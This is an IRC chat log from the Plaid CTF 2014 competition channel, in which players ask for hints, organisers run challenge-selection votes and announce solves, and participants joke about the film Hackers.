  4199. (14:42:38) (+houqp) a13k: you know the solution?
  4200. (14:42:42) (anyny0) Not being able to connect is part of it
  4201. (14:42:46) (a13k) tylerni7: thanks.
  4202. (14:42:52) (a13k) houqp: maybe
  4203. (14:43:00) (a13k) still some things to try
  4204. (14:43:00) (+houqp) ok pm me please :)
  4205. (14:43:06) (a13k) will pm if they don't work
  4206. (14:43:10) (anyny0) Any hints for WhatsCat? I really have no clue on where might the exploit be
  4207. (14:43:13) ••• qUit: (ebeip90) ([email protected]) Quit: Lost terminal
  4208. (14:43:36) (cybertech) so i am trying to find out the twenty cypto
  4209. (14:43:40) (cybertech) i found the key
  4210. (14:43:47) (cybertech) but its not the flag
  4211. (14:43:55) (cybertech) but than i found a poem
  4212. (14:44:16) (anyny0) The flag might be in the poem
  4213. (14:44:26) (+tylerni7) maybe specifically towards the end
  4214. (14:44:48) (a13k) houqp: issue is on my end
  4215. (14:44:51) (+mserrano) lol
  4216. (14:45:00) ••• qUit: (x7r0n) ([email protected]) Quit: Leaving
  4217. (14:45:05) (halfvollemelk) tips for rendezvous? i could rly use one
  4218. (14:45:09) (+houqp) nice :)
  4219. (14:45:41) (a13k) houqp: never hurts to ask though :-p I've ran/cometed in enough ctf's to know to ask if things are working as expected before beating my head against the desk
  4220. (14:45:47) (+mserrano) Good job hellman! there goes wheee
  4221. (14:46:53) (+houqp) a13k: yeah, rendezvous behaviours like it's down most of the time, which is sad :(
  4222. (14:47:05) (+tylerni7) nice mslc :)
  4223. (14:47:06) (+houqp) halfvollemelk: scroll back
  4224. (14:47:16) (Cimmi) cybertech: look at the end
  4225. (14:47:24) (hellman) open more crypto, i can't look at rsa :/
  4226. (14:47:29) (+tylerni7) hahah
  4227. (14:47:30) (+mserrano) hellman: lol why not
  4228. (14:47:33) (+tylerni7) why not xD
  4229. (14:48:24) (a13k) houqp: I kinda figured that. seemed obvious from the initial text from the challange. the issue I had was some configs
  4230. (14:48:26) (anyny0) Could someone give me a tiny lead on whatsCat?
  4231. (14:48:36) (cybertech) cimmi i am
  4232. (14:48:40) (cybertech) i dont get it
  4233. (14:48:43) (cybertech) hmm
  4234. (14:48:59) ••• qUit: (Mawat) ([email protected]) Ping timeout: 240 seconds
  4235. (14:49:22) ••• jOin: (Mawat) ([email protected])
  4236. (14:49:24) ••• jOin: (reanimus) ([email protected])
  4237. (14:49:28) (+mserrano) voting is open
  4238. (14:49:32) (+mserrano) I would recommend voting for chance
  4239. (14:49:38) (+mserrano) you've gotta get something this time :P
  4240. (14:49:41) ••• jOin: (ebeip90) ([email protected])
  4241. (14:49:48) (+tylerni7) that's how randomness works, sure
  4242. (14:49:51) (+tylerni7) -_-
  4243. (14:50:06) (+mserrano) yup
  4244. (14:50:08) (+mserrano) it is
  4245. (14:50:12) (x_x) Yeah, twenty is giving me a headache, too. Found the flag, but it doesn't accept.
  4246. (14:50:20) (+tylerni7) x_x: pm me/
  4247. (14:50:23) (+mserrano) x_x: pm me what you think the flag is
  4248. (14:50:24) (+mserrano) or tylerni7
  4249. (14:51:12) (asmoday) all in all am learning a bit, I really hate the plague though, now that move is ruined
  4250. (14:51:20) (+tylerni7) heh
  4251. (14:51:45) (Cimmi) The flag should be readable as a sentence
  4252. (14:51:50) (arthurdent) asmoday: hold your tongue sir
  4253. (14:52:09) (arthurdent) that movie is a classic
  4254. (14:52:21) (corewar) it can never be ruined
  4255. (14:52:21) (asmoday) classic pain the arse
  4256. (14:52:33) (asmoday) that gcc though
  4257. (14:53:16) (+pctf_scoreboard) that movie is the best
  4258. (14:53:18) (asmoday) plague could go back and become Dades dad
  4259. (14:53:31) ••• qUit: (virodoran) (uid2011@gateway/web/irccloud.com/x-nkhkmgpqfkcsbbie) Quit: Connection closed for inactivity
  4260. (14:53:35) ••• qUit: (xhs) (5e88c674@gateway/web/freenode/ip.94.136.198.116) Ping timeout: 240 seconds
  4261. (14:53:45) (arthurdent) wat
  4262. (14:54:16) (asmoday) then move through time and impregnate kate then really screw things up for Zero Cool
  4263. (14:54:24) (+tylerni7) lol
  4264. (14:55:34) (asmoday) after that Penn aka Hal can do some magic with Teller who was in the movie as Gibson Mainframe
  4265. (14:56:30) (asmoday) oh Phiber if you only knew
  4266. (14:56:40) ••• qUit: (badeec) (~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a) Quit: Leaving
  4267. (14:58:25) ••• jOin: (paraxor) (~aoepxnpe@unaffiliated/prazial)
  4268. (14:59:31) ••• qUit: (amohn9) ([email protected]) Remote host closed the connection
  4269. (14:59:48) ••• jOin: (rvpersie) ([email protected])
  4270. (15:00:08) ••• pArt: (XPenguin) ([email protected])
  4271. (15:00:12) (arthurdent) now that you mention it, gibson mainframe never spoke
  4272. (15:00:18) ••• jOin: (ghostpixel) ([email protected])
  4273. (15:00:21) (asmoday) right haha
  4274. (15:00:29) (asmoday) and Penn is never far from Teller
  4275. (15:00:44) (asmoday) its like his liver, little and full of stress
  4276. (15:01:03) ••• qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Ping timeout: 245 seconds
  4277. (15:01:10) (ghostpixel) i'm working on reekee, but i can't seem to find the file location where the site is being hosted from...
  4278. (15:01:53) ••• qUit: (Mawat) ([email protected]) Ping timeout: 245 seconds
  4279. (15:02:12) ••• jOin: (poppopret) ([email protected])
  4280. (15:02:37) (asmoday) I am surprised finding flight 370 wasnt a flag on this....
  4281. (15:02:45) (asmoday) too soon, too soon....
  4282. (15:02:56) ••• jOin: (Mawat) ([email protected])
  4283. (15:03:35) ••• qUit: (knc) (310f825d@gateway/web/freenode/ip.49.15.130.93) Ping timeout: 240 seconds
  4284. (15:03:58) ••• qUit: (phiber_) ([email protected]) Ping timeout: 245 seconds
  4285. (15:04:16) ••• qUit: (ghostpixel) ([email protected]) Client Quit
  4286. (15:05:15) (n00b13) what is the input key length for web 150
  4287. (15:05:23) (+cai_) heh we have over 1000 registered teams now :p (780 of them have at least 1 point)
  4288. (15:05:38) ••• qUit: (chunderstruck1) ([email protected]) Quit: Leaving.
  4289. (15:06:22) ••• jOin: (knc) (6a4cc70d@gateway/web/freenode/ip.106.76.199.13)
  4290. (15:08:14) ••• qUit: (jarCrack) ([email protected]) Quit: Verlassend
  4291. (15:09:16) (+tylerni7) ooo dragon sector close to 2nd place
  4292. (15:09:18) (+cai_) voting ends in 5 minutes
  4293. (15:09:48) ••• qUit: (fritz[]) ([email protected]) Ping timeout: 245 seconds
  4294. (15:10:04) (+mserrano) oh man DS
  4295. (15:10:06) (+mserrano) goin' hard
  4296. (15:10:08) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  4297. (15:10:19) ••• qUit: (nullProtectorate) ([email protected]) Remote host closed the connection
  4298. (15:10:48) (+cai_) 1 point difference :p
  4299. (15:10:48) (+cai_) now in 2nd
  4300. (15:10:48) (+cai_) nice
  4301. (15:11:22) (+mserrano) now you just have to catch 0xffa ;)
  4302. (15:12:05) ••• qUit: (dedet) (d42931c1@gateway/web/freenode/ip.212.41.49.193) Ping timeout: 240 seconds
  4303. (15:12:31) (tokki) OH SHIT
  4304. (15:12:39) (tokki) I GO IN AND THE CHRONOSPHERE IS ON
  4305. (15:12:43) (tokki) DANGGGGGG
  4306. (15:12:47) ••• jOin: (nullProtectorate) ([email protected])
  4307. (15:12:50) (+tylerni7) zomg, teh chronospherez
  4308. (15:13:00) (+tylerni7) but yeah voting time :)
  4309. (15:13:19) (tokki) wait im still confused tho, if you vote 1, does it skip the opened challs?
  4310. (15:13:37) (+tylerni7) yes
  4311. (15:13:42) (n00b13) any hints for web150?
  4312. (15:14:06) (tokki) WE NEED ANOTHER CHANCE VOTEZ 1
  4313. (15:14:16) (+mserrano) uh
  4314. (15:14:21) (+cai_) you mean 3
  4315. (15:14:21) (+mserrano) you mean vote 3
  4316. (15:14:21) ••• jOin: (rev1550) ([email protected])
  4317. (15:14:23) (tokki) k
  4318. (15:14:24) (tokki) 3
  4319. (15:14:32) ••• jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
  4320. (15:14:40) (tokki) i thought skipping as like skipping the tiles for opened challs
  4321. (15:14:48) (+mserrano) you are currently at gcc
  4322. (15:14:49) (tokki) nvm
  4323. (15:14:52) (+mserrano) lol
  4324. (15:14:55) (tokki) lol
  4325. (15:15:25) (+cai_) voting ends soon
  4326. (15:15:31) ••• jOin: (naam) ([email protected])
  4327. (15:15:32) (tokki) *gasp* *gaspgasp*
  4328. (15:15:36) (n00b13) is it just me or should web150 be worth more
  4329. (15:15:38) (+cai_) damn
  4330. (15:15:41) (+cai_) no luck on chance card
  4331. (15:15:45) (+cai_) new voting starts
  4332. (15:15:51) (+cai_) you have 5 mins :)
  4333. (15:15:54) (tokki) DANGGGGGG
  4334. (15:16:10) ••• qUit: (ubuntor) ([email protected]) Remote host closed the connection
  4335. (15:16:28) ••• qUit: (Cailou) ([email protected]) Ping timeout: 245 seconds
  4336. (15:16:34) (tokki) wait no i dont think i get the chronosphere thing but i guess its okay
  4337. (15:16:36) (corpille) crap no luck for today
  4338. (15:16:41) (tokki) ikr
  4339. (15:16:43) (+houqp) 15:50:31 +tylerni7 | that's how randomness works, sure
  4340. (15:16:44) (asmoday) I am playing pokemon
  4341. (15:16:45) (rev1550) is anyone else having problems download doge_stege
  4342. (15:17:05) ••• jOin: (rvpersie_) ([email protected])
  4343. (15:17:05) (tokki) go pikachu!!!!!!!!!
  4344. (15:17:10) ••• jOin: (phiber_) ([email protected])
  4345. (15:17:12) • tokki throws hamster
  4346. (15:17:21) (+cai_) tokki: what don't you get it?
  4347. (15:17:45) (tokki) k so you guys said that the voting skips opened challs
  4348. (15:17:47) (+cai_) the hatched tile is where the current position is
  4349. (15:17:52) (+cai_) yes it does
  4350. (15:17:57) (tokki) so if you vote like 1 right now,
  4351. (15:18:07) (+cai_) it will open pwnables 150
  4352. (15:18:08) (tokki) where do you go
  4353. (15:18:14) (+cai_) at the end of the present board
  4354. (15:18:29) (tokki) OH I GET IT
  4355. (15:18:32) (+cai_) :)
  4356. (15:18:35) (tokki) OH
  4357. (15:18:40) (+mserrano) 1 -> pwnable 150; 2 -> reversing 250; 3 -> pwnable 200; 4 -> forensics 350; 5 -> crypto 250; 6 -> misc 10
  4358. (15:18:42) (tokki) sry for my idioticness
  4359. (15:18:45) (+mserrano) pls misc 10
  4360. (15:18:46) (+mserrano) or
  4361. (15:18:48) (+mserrano) forensics 350
  4362. (15:18:52) (+mserrano) or
  4363. (15:18:53) (tokki) pls misc 10
  4364. (15:18:54) (corpille) misc 10
  4365. (15:18:54) (tokki) pls
  4366. (15:18:55) (+mserrano) pwnable 150
  4367. (15:18:56) (tokki) pls
  4368. (15:18:58) (+cai_) lol
  4369. (15:19:16) (anyny0) Mis 10 :D
  4370. (15:19:31) (tokki) pls misc
  4371. (15:19:33) (tokki) ily guys
  4372. (15:19:34) ••• jOin: (alexwebr) ([email protected])
  4373. (15:19:35) (+mserrano) no
  4374. (15:19:37) (+cai_) what about 2-part forensics 350?
  4375. (15:19:37) (tokki) pls
  4376. (15:19:40) (+mserrano) pls pwnable 150
  4377. (15:19:43) (+mserrano) or 2-part forensics
  4378. (15:19:44) (tokki) pls misc 10
  4379. (15:19:44) (Hertz_) pls nothing
  4380. (15:19:46) (tokki) pls
  4381. (15:19:47) (tokki) lol
  4382. (15:19:48) (+mserrano) Hertz_: lo
  4383. (15:19:48) (+mserrano) l
  4384. (15:20:03) (tokki) i aint got time fo dat
  4385. (15:20:09) (asmoday) is the point to just do pokemon forever
  4386. (15:20:19) (tokki) pokemon!
  4387. (15:20:20) ••• jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
  4388. (15:20:21) (asmoday) its stuck on chaning art i think
  4389. (15:20:24) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  4390. (15:20:24) (asmoday) changing
  4391. (15:20:35) (asmoday) ha i think i broke it
  4392. (15:20:43) (+cai_) misc10 is opened
  4393. (15:20:44) (+cai_) lol
  4394. (15:20:46) (+cai_) you guys win
  4395. (15:20:48) ••• jOin: (naam) ([email protected])
  4396. (15:20:59) (+mserrano) lol
  4397. (15:21:05) (tokki) ILYyYYYYY
  4398. (15:21:32) (tokki) ♥︎
  4399. (15:21:36) (+mserrano) lol
  4400. (15:21:38) (+cai_) time to watch people submitting wrong number
  4401. (15:21:42) (+cai_) lol
  4402. (15:21:43) (+mserrano) everyone is guessing the wrong thing
  4403. (15:21:50) (tokki) lol
  4404. (15:21:51) (+mserrano) like literally everyone
  4405. (15:21:54) (tokki) lol
  4406. (15:21:57) (subsnake) will there be any hints soon?
  4407. (15:21:58) (tokki) lemme join ;)
  4408. (15:22:05) (+mserrano) YEAH BS LABS
  4409. (15:22:05) (tokki) NOT TILL THE CHANCE
  4410. (15:22:07) (+cai_) grats BS Labs
  4411. (15:22:09) (+mserrano) FIRST BLOOD
  4412. (15:22:10) (tokki) THE FREAKING CHANCE
  4413. (15:22:13) (tokki) 300G
  4414. (15:22:21) (+cai_) voting is up again lol
  4415. (15:22:26) (+mserrano) yay MSLC
  4416. (15:22:34) (+mserrano) and H4x0rPsch0rr
  4417. (15:22:38) (+mserrano) there goes the breakthrough
  4418. (15:22:39) (anyny0) Hmm
  4419. (15:22:47) (+cai_) except there is no bonus point
  4420. (15:22:49) (+cai_) lol
  4421. (15:23:28) (anyny0) x)
  4422. (15:23:38) ••• jOin: (wahwah) ([email protected])
  4423. (15:23:47) (tokki) shet
  4424. (15:23:58) (+mserrano) yay dcua
  4425. (15:23:59) (+mserrano) 4 solves
  4426. (15:24:01) (tokki) i cant believe im stuck in misc 10
  4427. (15:24:14) (+mserrano) misc 10 is a quality problem
  4428. (15:24:14) ••• jOin: (vooX) (4e81ae54@gateway/web/freenode/ip.78.129.174.84)
  4429. (15:24:22) (tokki) hmm..
  4430. (15:24:30) ••• qUit: (melanie) ([email protected])
  4431. (15:24:38) (corpille) 38.55 * 1700 mmhh ...
  4432. (15:24:46) (asmoday) yeah not what you think
  4433. (15:24:55) (+cai_) it's hard
  4434. (15:25:01) (+tylerni7) yeah man
  4435. (15:25:02) (+cai_) not everyone can do that correctly
  4436. (15:25:04) (+tylerni7) multiplication is hard
  4437. (15:25:12) (tokki) D:
  4438. (15:25:15) (tokki) D::
  4439. (15:25:17) ••• pArt: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
  4440. (15:25:29) (asmoday) google is not your fiend
  4441. (15:25:29) ••• jOin: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
  4442. (15:25:32) (asmoday) friend
  4443. (15:25:32) (tokki) D:::::
  4444. (15:25:48) (tokki) how did people solve dis
  4445. (15:25:56) (vooX) damn, web300 is more easier than web200..
  4446. (15:26:48) • subsnake pings tylerni7 pm
  4447. (15:27:09) • tokki hurls trout
  4448. (15:27:22) (bobsteam) is it vooX ?
  4449. (15:27:54) (vooX) yup, at least the kpop one
  4450. (15:27:57) (vooX) which i'm still fighting with
  4451. (15:28:04) (+mserrano) bubble bubble pop pop
  4452. (15:28:09) (bobsteam) ah, I haven't started kpop yet
  4453. (15:28:23) (tokki) kpop is the best
  4454. (15:28:30) (bobsteam) I'm too busy hating memes and cats
  4455. (15:28:46) (+cai_) man we are gonna hit 10K submissions soon >:-)
  4456. (15:29:00) (+tylerni7) lol
  4457. (15:29:10) (rray) web300 is frustrating ;_;
  4458. (15:29:14) ••• qUit: (player10) ([email protected]) Ping timeout: 276 seconds
  4459. (15:29:25) (tokki) lol
  4460. (15:29:36) (vooX) not as furstrating as songs-web
  4461. (15:30:07) (+tylerni7) forensics 250 is cool :)
  4462. (15:30:07) (+cai_) forensics opened
  4463. (15:30:11) ••• qUit: (knc) (6a4cc70d@gateway/web/freenode/ip.106.76.199.13)
  4464. (15:30:15) (+tylerni7) good challenge to open up :)
  4465. (15:30:15) (+mserrano) CURLCORRRRRRRRRRRRRRRRRRE
  4466. (15:30:29) (tokki) CURLLLLLLL
  4467. (15:30:35) ••• pArt: (paraxor) (~aoepxnpe@unaffiliated/prazial)
  4468. (15:31:06) ••• qUit: (frozencemetery) ([email protected]) Ping timeout: 250 seconds
  4469. (15:31:50) ••• qUit: (naam) ([email protected]) Ping timeout: 276 seconds
  4470. (15:32:29) ••• qUit: (lfogel) ([email protected]) Ping timeout: 276 seconds
  4471. (15:32:56) ••• qUit: (rev1550) ([email protected]) Quit: Leaving.
  4472. (15:34:34) (marcan) man, paris took way too long.
  4473. (15:34:37) (marcan) but that was cute.
  4474. (15:34:42) (+cai_) grats :)
  4475. (15:34:59) ••• jOin: (obriencd) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  4476. (15:35:00) (dracu) i don't get the flag for misc10 - i mean i got it, but i don't get it, u know ? :D
  4477. (15:35:22) (obriencd) i didnt get it so i really dont get it
  4478. (15:35:27) (+cai_) if you got the flag, it would have accepted and gave you points!
  4479. (15:35:51) (anyny0) The number's important but have so many flag possibilites D=
  4480. (15:36:04) ••• qUit: (mascot) ([email protected]) Quit: Leaving.
  4481. (15:36:19) (dracu) i actually got the flag
  4482. (15:36:26) (dracu) and the points :)
  4483. (15:36:31) ••• jOin: (mouth`1) ([email protected])
  4484. (15:36:32) (+cai_) ah
  4485. (15:36:36) (dracu) but why was that the flag ?
  4486. (15:36:36) ••• jOin: (pouete) (~pouete@unaffiliated/pouete)
  4487. (15:36:57) ••• jOin: (p45741) ([email protected])
  4488. (15:36:57) (+cai_) the process of getting that flag should've let you know?
  4489. (15:37:02) (dracu) yes
  4490. (15:37:25) ••• jOin: (krycek1) ([email protected])
  4491. (15:37:39) (+cai_) then you understand why it is what it is :p
  4492. (15:38:05) (dracu) yeah... i was just amazed that it said "success"... (wtf?!)
  4493. (15:38:17) ••• qUit: (p4574) ([email protected]) Ping timeout: 252 seconds
  4494. (15:38:20) (+cai_) :)
  4495. (15:38:27) (dracu) fun, but hard ctf 4 n00bs
  4496. (15:38:31) ••• jOin: (frozencemetery) ([email protected])
  4497. (15:38:31) ••• mOde: (ChanServ) sets (+v frozencemetery)
  4498. (15:38:38) ••• qUit: (mouth`) ([email protected]) Ping timeout: 252 seconds
  4499. (15:38:39) ••• qUit: (krycek) ([email protected]) Ping timeout: 252 seconds
  4500. (15:38:50) (asmoday) if this is rfc i will be very upset
  4501. (15:39:12) ••• qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Ping timeout: 272 seconds
  4502. (15:39:17) ••• qUit: (kanghee) ([email protected]) Remote host closed the connection
  4503. (15:39:27) (+cai_) yay over 10K submission \o/
  4504. (15:39:36) (+houqp) \o/
  4505. (15:39:54) ••• qUit: (bloup_) (95acea33@gateway/web/freenode/ip.149.172.234.51) Quit: Page closed
  4506. (15:40:01) (tokki) lol
  4507. (15:41:08) ••• jOin: (hammerpig) (~user@gateway/tor-sasl/hammerpig)
  4508. (15:41:14) (vooX) damn, the last stage of thes web-songs makes me crazy... :(
  4509. (15:42:05) ••• qUit: (obriencd) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
  4510. (15:43:43) ••• jOin: (talanor) ([email protected])
  4511. (15:45:27) ••• jOin: (naam) ([email protected])
  4512. (15:45:32) (NK_) tylerni7: i feel like there is a disturbance in the force
  4513. (15:45:45) (NK_) the gameboard say our last submission was a day ago
  4514. (15:45:50) (+cai_) NK_: refresh?
  4515. (15:46:00) (NK_) same
  4516. (15:46:02) (+cai_) hmm
  4517. (15:46:14) ••• pArt: (garganoth) ([email protected])
  4518. (15:46:17) (+cai_) cache flush refresh?
  4519. (15:46:31) (NK_) the scoreboard say 15 min though
  4520. (15:46:37) ••• jOin: (mad0na) ([email protected])
  4521. (15:47:01) (+cai_) yeah, don't worry about it.. it's just there more for the styles/quick info, but things are correct in db
  4522. (15:47:02) (NK_) hm cache flush refresh say the same
  4523. (15:47:02) ••• jOin: (lstamour_) ([email protected])
  4524. (15:47:07) (+cai_) weird :/
  4525. (15:47:11) (NK_) yep
  4526. (15:47:21) (NK_) let's see on another browser just in case
  4527. (15:47:39) (vooX) btw, this year, web is pretty hard
  4528. (15:47:57) (NK_) same with another browser
  4529. (15:47:58) (+tylerni7) vooX: I think normally we don't have much web
  4530. (15:48:05) (+tylerni7) people asked for more web and forensics
  4531. (15:48:07) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  4532. (15:48:12) (NK_) yes it's good
  4533. (15:48:15) (+cai_) NK_: strange. it
  4534. (15:48:20) (+cai_) it's probably cache on our side then
  4535. (15:48:21) (+tylerni7) we gave them web and forenics that we thought were fun :)
  4536. (15:48:33) (+cai_) but yeah, i wouldn't worry about it
  4537. (15:48:36) (NK_) too much exploit / reverse in the past years
  4538. (15:48:39) (+cai_) thanks for letting us know tho
  4539. (15:48:42) (+tylerni7) NK_: :/
  4540. (15:48:55) (+tylerni7) we have more of those challenges too, they just aren't opened yet :P
  4541. (15:48:56) (NK_) tylerni7: i know not everyone aggree with this :p
  4542. (15:49:06) (mrsmith67) can anyone help me with multipliation?
  4543. (15:49:12) (mrsmith67) i know it has to do with time...
  4544. (15:49:19) (+tylerni7) mrsmith67: multiplication is hard
  4545. (15:49:23) (+tylerni7) you should have a computer do it
  4546. (15:49:27) (NK_) addition, multiplication and division is hard
  4547. (15:49:31) (NK_) according to the past years
  4548. (15:50:08) (+cai_) math is hard
  4549. (15:50:31) ••• jOin: (lfogel) ([email protected])
  4550. (15:50:58) ••• jOin: (DeadheadTn) ([email protected])
  4551. (15:51:12) (pouete) as a question : on __nightmares__ have really nothing to do with pyjail ?
  4552. (15:51:16) (+cai_) NK_: you can guess what will be on next year :)
  4553. (15:51:28) ••• jOin: (psaikonet1) ([email protected])
  4554. (15:51:45) ••• jOin: (Apple_Eater) ([email protected])
  4555. (15:52:00) ••• qUit: (mouth`1) ([email protected]) Quit: Leaving.
  4556. (15:52:06) (tokki) call you my everything~
  4557. (15:52:33) (pouete) ( just tried to call ().__nighmares__ . was not disapointed O )
  4558. (15:52:39) (tokki) :O
  4559. (15:52:47) ••• jOin: (n00bz) ([email protected])
  4560. (15:52:59) ••• nIck: (Zoro) is now known as (awrign)
  4561. (15:53:03) (tokki) me no getz misc 10
  4562. (15:53:08) (tokki) this is sad
  4563. (15:53:25) (Pitr_) I get it but only after someone explained it to me 8)
  4564. (15:53:47) ••• qUit: (nullProtectorate) ([email protected]) Remote host closed the connection
  4565. (15:53:55) ••• nIck: (awrign) is now known as (armerichigo)
  4566. (15:54:03) ••• nIck: (armerichigo) is now known as (americhigo)
  4567. (15:54:08) (tokki) hmm
  4568. (15:54:14) (asmoday) ok seriously for curl, is this a DEP or Reverse
  4569. (15:54:30) (+tylerni7) what do you mean DEP?
  4570. (15:54:42) (+tylerni7) anyway, it's forensics
  4571. (15:54:42) (tokki) DEPRESSION
  4572. (15:54:47) (asmoday) sorry dpe, deep packet inspect
  4573. (15:54:50) (dct1) johnny DEP
  4574. (15:54:55) (tokki) LOL
  4575. (15:54:57) (americhigo) that would be dpi
  4576. (15:54:59) ••• jOin: (maurer) ([email protected])
  4577. (15:55:14) ••• qUit: (n00b13) (~n00b13@unaffiliated/nitsua)
  4578. (15:55:23) (asmoday) said the guy who has slept ;p ha
  4579. (15:55:35) ••• qUit: (Frisk0) ([email protected]) Ping timeout: 240 seconds
  4580. (15:55:47) ••• jOin: (bwn3r) ([email protected])
  4581. (15:55:47) ••• qUit: (bwn3r) ([email protected]) Changing host
  4582. (15:55:47) ••• jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
  4583. (15:56:11) ••• nIck: (americhigo) is now known as (Zoro)
  4584. (15:57:04) (Zoro) `-`
  4585. (15:57:17) ••• qUit: (psaikonet1) ([email protected]) Quit: Leaving.
  4586. (15:57:52) ••• jOin: (psaikonet1) ([email protected])
  4587. (15:57:53) (asmoday) is it in the tcpdump or the memory
  4588. (15:58:14) (Apple_Eater) I had a question with kpop -- just wanted to see if I am on the right track. Anyone around?
  4589. (15:58:21) (Pitr_) it's DERP
  4590. (15:58:24) (+tylerni7) Apple_Eater: you can pm me
  4591. (15:58:27) (tokki) *gasp*
  4592. (15:58:27) (Apple_Eater) Thanks
  4593. (15:58:32) (tokki) DERP!!!
  4594. (15:59:03) (ShortKidd) tyler, are you ever not here?
  4595. (15:59:20) (tokki) is misc 10 like a nonsense question
  4596. (15:59:20) (asmoday) this damn game had me questioning 65535 how dare you
  4597. (15:59:21) (WhizzMan) urgh, multiplication *is* hard
  4598. (15:59:31) ••• jOin: (killobyte) ([email protected])
  4599. (15:59:32) (tokki) like the answer should be like unicorns or something
  4600. (15:59:48) (killobyte) hi, who can i ask about whatscat task?
  4601. (15:59:52) (+tylerni7) killobyte: me
  4602. (15:59:53) (+tylerni7) pm
  4603. (16:00:02) (ShortKidd) the heartbleed one, tokki?
  4604. (16:00:13) (tokki) the multiplication one :p
  4605. (16:00:26) (ShortKidd) oh lol
  4606. (16:00:32) ••• mOde: (ChanServ) sets (+o cai_)
  4607. (16:00:33) ••• jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:ed6f:4299:1327:d3fe)
  4608. (16:00:42) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $10 added to each cash prizes so far (from CHANCE card))
  4609. (16:00:42) (tokki) *gasp* cai is op!
  4610. (16:00:43) (cybertech) the mutiplication one is not working
  4611. (16:00:47) (tokki) lol
  4612. (16:00:52) (cybertech) i found the answer is wont take it
  4613. (16:00:57) ••• mOde: (ChanServ) sets (-o cai_)
  4614. (16:01:07) (tokki) lol
  4615. (16:01:10) (subsnake) xD
  4616. (16:01:11) (Pitr_) cybertech, try querying an admin
  4617. (16:01:16) (tokki) xD
  4618. (16:01:19) (cybertech) hmm
  4619. (16:01:25) (cybertech) no admins on here
  4620. (16:01:34) (asmoday) cybertech its not 65535
  4621. (16:01:38) (shadghost) admins are 'voiced' here
  4622. (16:01:40) (cybertech) hmm
  4623. (16:01:41) (tokki) lol
  4624. (16:01:45) (subsnake) nor unicorn
  4625. (16:01:54) (cybertech) i thought that was the answer
  4626. (16:01:55) (tokki) damn!
  4627. (16:02:07) (tokki) i was submitting unicorns!
  4628. (16:02:08) (+cai_) cybertech: it will take it when you have the correct answer
  4629. (16:02:15) (asmoday) think outside that box
  4630. (16:02:17) (cybertech) ok
  4631. (16:02:29) (Yerer) Oh haha
  4632. (16:02:44) (Yerer) I'm surprised that was the answer for misc10
  4633. (16:03:20) (+cai_) :)
  4634. (16:03:23) ••• qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Quit: Leaving
  4635. (16:03:33) ••• qUit: (T1mb0) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Organize your IRC
  4636. (16:03:41) ••• qUit: (LouTerrailloune) ([email protected]) Ping timeout: 276 seconds
  4637. (16:03:51) ••• jOin: (shortkidd_) (60279873@gateway/web/freenode/ip.96.39.152.115)
  4638. (16:04:13) ••• qUit: (lstamour_) ([email protected]) Quit: Lost terminal
  4639. (16:04:23) (WhizzMan) I can't even see a box
  4640. (16:04:25) ••• jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
  4641. (16:04:53) (asmoday) You will punch yourself after knowing the answer
  4642. (16:05:01) (WhizzMan) oh I'm sure I will
  4643. (16:05:02) (asmoday) like really hard
  4644. (16:05:05) (NK_) :)
  4645. (16:05:29) (tokki) D:
  4646. (16:05:47) (asmoday) I will kick a baby, luckily none are near me ever, after I get the answer to a few of these
  4647. (16:05:58) (asmoday) Dramatic over thinking happens at defcon every year
  4648. (16:06:13) (tokki) D:
  4649. (16:06:14) (WhizzMan) puppies and kittens will be good supplicants
  4650. (16:06:31) (pouete) I would like to know if i am on the right track, should i ask my question on the public chan ?
  4651. (16:06:35) ••• qUit: (lfogel) ([email protected]) Ping timeout: 240 seconds
  4652. (16:06:37) (+tylerni7) pouete: pm me
  4653. (16:06:47) (+tylerni7) may not be able to answer
  4654. (16:06:48) (+tylerni7) but yeah
  4655. (16:07:00) (tokki) THE PLAGUEEEEEE
  4656. (16:07:05) ••• jOin: (naam) ([email protected])
  4657. (16:07:05) ••• qUit: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
  4658. (16:07:14) ••• nIck: (shortkidd_) is now known as (ShortKidd)
  4659. (16:07:25) (WhizzMan) Yersinia
  4660. (16:08:33) • tokki depresses over the scoreboard
  4661. (16:09:10) (Gynvael) agreed
  4662. (16:09:14) (ShortKidd) let's be depressed together
  4663. (16:09:16) (Gynvael) eb huh
  4664. (16:10:10) (+tylerni7) Gynvael: you guys got time :)
  4665. (16:10:15) (+tylerni7) btw which of you solved rsa?
  4666. (16:10:22) (Gynvael) adam_i
  4667. (16:10:23) (+cai_) Nice
  4668. (16:10:41) (+tylerni7) ooo curlcore solve
  4669. (16:10:41) (+tylerni7) nice
  4670. (16:10:52) (+cai_) 0xffa
  4671. (16:11:06) (+cai_) the vote begins :)
  4672. (16:11:11) (tokki) *gasp*
  4673. (16:11:15) (poppopret) anyone wanna push me in the right direction for web150? =/
  4674. (16:11:17) ••• qUit: (poppopret) ([email protected]) Remote host closed the connection
  4675. (16:11:25) (Gynvael) yeah
  4676. (16:11:38) ••• qUit: (plaintext) ([email protected]) Ping timeout: 252 seconds
  4677. (16:11:40) ••• jOin: (poppopret) ([email protected])
  4678. (16:11:40) (Gynvael) protip for web150: staying on IRC after asking question ftw
  4679. (16:11:44) (tokki) MUST VOTEZ 1
  4680. (16:11:47) (+tylerni7) heh
  4681. (16:11:49) (shadghost) lol
